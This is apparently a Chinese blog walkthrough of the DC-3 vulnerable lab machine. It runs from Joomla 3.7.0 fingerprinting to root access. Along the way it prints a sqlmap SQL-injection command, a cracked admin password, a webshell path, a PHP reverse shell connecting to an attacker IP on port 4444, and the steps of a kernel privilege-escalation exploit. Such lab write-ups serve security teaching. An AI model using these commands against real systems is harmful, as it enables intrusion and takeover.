靶机-DC3

查找靶机IP

在这里插入图片描述

端口扫描

在这里插入图片描述

目录扫描

在这里插入图片描述

找到两个可访问链接

http://192.168.254.3/index.php

在这里插入图片描述

http://192.168.254.3/administrator/

在这里插入图片描述

看一下指纹

在这里插入图片描述

在这里插入图片描述

确定有joomla

JoomScan安装
1、更新apt
sudo apt update
2、安装joomscan
sudo apt install joomscan

使用joomscan来扫描DC-3

joomscan -u 192.168.254.3

发现joomla版本 3.7.0

在这里插入图片描述

查找漏洞利用

在这里插入图片描述

将模块复制到当前目录

searchsploit -m 42033.txt
在这里插入图片描述

查看

在这里插入图片描述

看到sqlmap 语句

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

将localhost改成靶机IP

在这里插入图片描述

爆表

python sqlmap.py -u “http://192.168.254.3/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --tables -D joomladb -p list[fullordering]
在这里插入图片描述

查表

在这里插入图片描述

查字段

在这里插入图片描述

admin$2y 10 10 10DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zuadmin

john破解

在这里插入图片描述

snoopy

所以:用户名密码:admin,snoopy

在http://192.168.254.3/index.php发现编写处,发现有过滤,跳过

在这里插入图片描述

http://192.168.254.3/administrator/index.php

发现文件上传

在这里插入图片描述

在这里插入图片描述

在Joomla框架中,Templates是直接存在于根目录下的,于是我们进行访问查看一句话木马是否上传成功,我们进入网站查看测试。

http://192.168.254.3/templates/beez3/shell.php

蚁剑连接

发现常规反弹不了,通过php文件反弹

<?php
system ("bash -c 'sh -i >& /dev/tcp/192.168.254.6/4444 0>&1'");
?>

蚁剑上传

在这里插入图片描述

反弹成功

在这里插入图片描述

变成交互shell界面

python -c 'import pty;pty.spawn("/bin/bash")'

sudo -l什么都没有

cat /etc/issue查看版本
在这里插入图片描述

发现Ubuntu版本

发现一个提权漏洞(Privilege Escalation 特权升级)

在这里插入图片描述

python3 -m http.server 8088

在这里插入图片描述

访问网页

http://192.168.254.6:8088/39772.txt

在这里插入图片描述

出现这个说明服务开启成功

接着我们下载该压缩包并放到kali桌面里,解压该文件,然后在桌面开启http服务,将下载好的文件导入到DC-3靶机里

在这里插入图片描述

在这里插入图片描述

直接提取是报错:装入归档文件时出现了一个错误
解决办法
用一下命令解压

┌──(root💀kali)-[~]
└─#jar xvf 39772.zip
Ick! 0xa0a0a0a
┌──(root💀kali)-[~]
└─# unzip -n 39772.zip

exp地址是

http://http://192.168.254.6:8088//39772/39772/exploit.tar

回到我们的虚拟终端,利用wget命令下载该工具

wget http://http://192.168.254.6:8088//39772/39772/exploit.tar

这里我直接用蚁剑上传

在这里插入图片描述

在shell中进行解压。

tar -xvf exploit.tar

在这里插入图片描述

进入解压后的目录中,按照searchsploit工具中的提示进行提权。

cd ebpf_mapfd_doubleput_exploit
ls
./compile.sh
./doubleput
在这里插入图片描述

获得root权限,找到flag

在这里插入图片描述

  • 16
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值